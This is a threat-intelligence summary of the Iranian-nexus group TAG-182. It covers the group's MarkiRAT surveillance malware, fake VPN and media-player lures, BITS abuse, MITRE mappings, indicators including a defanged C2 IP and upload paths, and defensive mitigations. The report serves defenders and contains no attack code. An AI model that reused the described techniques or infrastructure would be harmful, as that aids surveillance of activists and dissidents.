Full Report
Discover how Iranian-nexus threat cluster TAG-182 uses MarkiRAT malware and fake VPN/media apps to conduct cyber surveillance operations against domestic targets.
Analysis Summary
# Threat Actor: TAG-182
## Attribution & Identity
* **Identification:** TAG-182 is an Iranian-nexus threat cluster believed to be a component of Iran’s broader state surveillance ecosystem.
* **Aliases/Associated Groups:** The group exhibits significant tradecraft overlaps with **Ferocious Kitten**.
* **Known Associations:** Linked to the Iranian government’s security apparatus, specifically targeting perceived dissidents and foreign collaborators.
## Activity Summary
Recorded Future’s Insikt Group identified new infrastructure in early to mid-2026 used by TAG-182 to disseminate the **MarkiRAT** surveillance tool. The campaigns followed a period of kinetic conflict (April 2026) and the restoration of internet access in Iran (May 2026). The actor utilizes social media platforms (Instagram) and custom-built staging websites to distribute malicious payloads disguised as utility software.
## Tactics, Techniques & Procedures
* **Social Engineering:** Uses lures such as free download tools and fake VPN applications to trick users.
* **Fake Applications:** Distribution of malicious Android and Windows applications masquerading as legitimate services (e.g., media players, VPNs).
* **BITS Abuse:** Utilization of Windows Background Intelligent Transfer Service (BITS) for file transfers to evade detection.
* **Phishing:** Use of spearphishing links and attachments to drive traffic to staging sites.
* **Persistence & Surveillance:** Capability to capture screenshots and upload local files to C2.
**MITRE ATT&CK Mapping:**
* **T1583.001:** Acquire Infrastructure: Domains
* **T1566.001/.002:** Phishing: Spearphishing Attachment/Link
* **T1204.002:** User Execution: Malicious File
* **T1197:** BITS Jobs
* **T1059.003:** Command and Scripting Interpreter: Windows Command Shell
## Targeting
* **Sectors:** Civil society, human rights, and technology (VPN/Security).
* **Geography:** Primarily Iran (domestic) and Iranians living abroad (diaspora).
* **Victims:** Anti-government networks, activists, human rights advocates, and individuals perceived as dissidents or foreign collaborators.
## Tools & Infrastructure
* **Malware Families:** MarkiRAT (a backdoor/surveillance tool).
* **File Names:** `YEPlayer.dll`, `YEMPlayer.zip`, `Pis2rayVPN.msi`, `YESHICA`.
* **Infrastructure:**
* **C2 IP:** 212[.]83[.]61[.]198 (Hosted by 23M GmbH / AS47447).
* **Specific Paths:** `/i.php?u=`, `/uploadx.php?u=`.
## Implications
TAG-182 represents a persistent digital enforcement arm of the Iranian state. The redirection of their focus toward intensified digital surveillance following kinetic conflicts suggests that Iran prioritizes internal stability and the monitoring of dissent via cyber means. Their ability to maintain operations despite public exposure (e.g., reusing "YESHICA" themes) indicates a resilient and well-resourced operational pace.
## Mitigations
* **Endpoint Security:** Deploy EDR solutions to monitor for the abuse of `bitsadmin.exe` and unauthorized BITS job creations.
* **App Verification:** Educate users to avoid downloading VPNs or media players from unofficial or third-party websites, particularly those promoted via social media.
* **Network Monitoring:** Block known C2 IPs and monitor for traffic to suspicious PHP endpoints (`/i.php?u=`) associated with MarkiRAT.
* **YARA/Sigma:** Implement specific detection rules (as provided by Insikt Group) to identify MarkiRAT file signatures and process behaviors in the enterprise environment.